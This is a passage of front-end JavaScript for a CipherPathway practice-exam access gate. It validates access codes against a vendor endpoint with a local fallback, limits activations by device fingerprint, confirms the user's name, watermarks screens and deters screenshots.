{code: 'SD-DEMO-2026', name: 'Preview Reader', email: 'preview@cipherpathway.com', expires: '2099-12-31', products: ['manual', 'exam']},
];
async function validateCode(input){
const code = input.trim().toUpperCase();
try {
const resp = await fetch(FULFILLMENT_WORKER_URL + '/validate?code=' + encodeURIComponent(code) + '&product=' + THIS_PRODUCT, {
method: 'GET', mode: 'cors', cache: 'no-store'
});
const data = await resp.json();
if (data.valid) {
const exp = data.expires_at ? new Date(data.expires_at) : null;
const expString = exp ? exp.toISOString().split('T')[0] : 'unknown';
return {ok: true, entry: {code, name: data.name || 'Customer', expires: expString, products: [data.product]}};
}
if (data.reason === 'expired') return {ok: false, reason: 'expired', entry: {code, expires: (data.expired_at||'').split('T')[0]}};
if (data.reason === 'wrong_product') return {ok: false, reason: 'wrong_product'};
if (data.reason === 'device_limit_exceeded') return {ok: false, reason: 'limit_reached'};
} catch (err) {
console.warn('Worker unreachable, falling back to local codes', err);
}
const fallback = FALLBACK_CODES.find(e => e.code === code);
if (!fallback) return {ok: false, reason: 'unknown'};
const today = new Date();
const exp = new Date(fallback.expires);
if (exp < today) return {ok: false, reason: 'expired', entry: fallback};
if (!fallback.products || !fallback.products.includes(THIS_PRODUCT)) {
return {ok: false, reason: 'wrong_product', entry: fallback};
}
return {ok: true, entry: fallback};
}
function deviceFingerprint(){
const parts = [navigator.userAgent, screen.width+'x'+screen.height,
new Date().getTimezoneOffset(), navigator.language||'', navigator.platform||''];
let h = 0; const s = parts.join('|');
for (let i = 0; i < s.length; i++){ h = ((h << 5) - h) + s.charCodeAt(i); h |= 0; }
return 'fp_' + Math.abs(h).toString(36);
}
function deviceCheck(code){
const fp = deviceFingerprint();
const storedFp = localStorage.getItem('sd_fp_' + code);
const storedCount = parseInt(localStorage.getItem('sd_count_' + code) || '0', 10);
if (storedFp && storedFp !== fp) return {ok: false, reason: 'different_device'};
if (!storedFp){
if (storedCount >= MAX_ACTIVATIONS) return {ok: false, reason: 'limit_reached'};
localStorage.setItem('sd_fp_' + code, fp);
localStorage.setItem('sd_count_' + code, (storedCount + 1).toString());
return {ok: true, isFirstUse: true};
}
return {ok: true, isFirstUse: false};
}
function nameMatches(input, expected){
const norm = s => (s||'').toLowerCase().replace(/[^a-z]/g,'');
return norm(input) === norm(expected);
}
const gateInput = document.getElementById('codeInput');
const gateBtn = document.getElementById('gateBtn');
const gateError = document.getElementById('gateError');
const nameStep = document.getElementById('nameStep');
const nameInput = document.getElementById('nameInput');
const nameBtn = document.getElementById('nameBtn');
const nameError = document.getElementById('nameError');
let pendingEntry = null;
function showError(msg){
gateError.textContent = msg;
gateError.classList.add('show');
gateInput.focus(); gateInput.select();
}
function enterExam(entry){
// Hide gate, show start screen
document.getElementById('screen-gate').classList.remove('active');
document.getElementById('screen-start').classList.add('active');
// Set watermarks
const wmText = entry.name + ' \u00b7 expires ' + entry.expires;
document.getElementById('examWmQuiz').textContent = wmText;
document.getElementById('examWmResults').textContent = wmText;
}
async function tryEnter(){
gateBtn.disabled = true;
const originalBtnText = gateBtn.textContent;
gateBtn.textContent = 'Verifying…';
let result;
try {
result = await validateCode(gateInput.value);
} finally {
gateBtn.disabled = false;
gateBtn.textContent = originalBtnText;
}
if (!result.ok){
if (result.reason === 'expired')
showError('This access code has expired (' + result.entry.expires + '). Contact support@cipherpathway.com.');
else if (result.reason === 'wrong_product')
showError('This access code grants access to other CipherPathway products, but not the practice exam.');
else
showError('Access code not recognized.');
return;
}
const entry = result.entry;
const dc = deviceCheck(entry.code);
if (!dc.ok){
if (dc.reason === 'different_device')
showError('This access code is already in use on a different device and has reached its activation limit. Per the CipherPathway license, codes cannot be reset across devices. Please continue using your originally activated devices.');
else if (dc.reason === 'limit_reached')
showError('This access code has reached its 2-device activation limit. Per the CipherPathway license, activations cannot be transferred or reset. Please continue using your previously activated devices for the remainder of your access window.');
return;
}
if (dc.isFirstUse){
pendingEntry = entry;
document.getElementById('gate-step1').style.display = 'none';
nameStep.style.display = 'block';
nameInput.focus();
return;
}
enterExam(entry);
}
function tryNameConfirm(){
if (!pendingEntry) return;
if (!nameMatches(nameInput.value, pendingEntry.name)){
nameError.classList.add('show');
nameInput.focus(); nameInput.select();
return;
}
enterExam(pendingEntry);
}
gateBtn.addEventListener('click', tryEnter);
gateInput.addEventListener('keypress', e => { if (e.key === 'Enter') tryEnter(); });
gateInput.addEventListener('input', e => {
let v = e.target.value.toUpperCase().replace(/[^A-Z0-9]/g, '');
if (v.length > 2) v = v.slice(0,2) + '-' + v.slice(2);
if (v.length > 7) v = v.slice(0,7) + '-' + v.slice(7);
if (v.length > 12) v = v.slice(0,12);
e.target.value = v;
gateError.classList.remove('show');
});
nameBtn.addEventListener('click', tryNameConfirm);
nameInput.addEventListener('keypress', e => { if (e.key === 'Enter') tryNameConfirm(); });
nameInput.addEventListener('input', () => nameError.classList.remove('show'));
// Tier 1 — disable right-click after gate passes
document.addEventListener('contextmenu', e => {
if (!document.getElementById('screen-gate').classList.contains('active')) e.preventDefault();
});
// Tier 1 — screenshot/print key deterrent
document.addEventListener('keydown', e => {
if (document.getElementById('screen-gate').classList.contains('active')) return;
const isScreenshot = e.key === 'PrintScreen' ||
(e.metaKey && e.shiftKey && ['3','4','5'].includes(e.key)) ||
(e.ctrlKey && e.key === 'p');
if (isScreenshot){
showScreenshotWarning();
if (e.ctrlKey && e.key === 'p') e.preventDefault();
}
});
function showScreenshotWarning(){
if (document.getElementById('ssWarning')) return;
const overlay = document.createElement('div');
overlay.id = 'ssWarning';
overlay.style.cssText = 'position:fixed;top:0;left:0;right:0;bottom:0;z-index:9999;'+
'background:rgba(255,255,255,0.97);display:flex;align-items:center;'+
'justify-content:center;font-family:Cinzel,serif;text-align:center;padding:40px;';
overlay.innerHTML = '
'+
'
Licensed Content Notice
'+
'
'+
'Every screen you see is watermarked with your name. Screenshots or recordings shared outside your own preparation use violate your license and are traceable to you.
CipherPathway
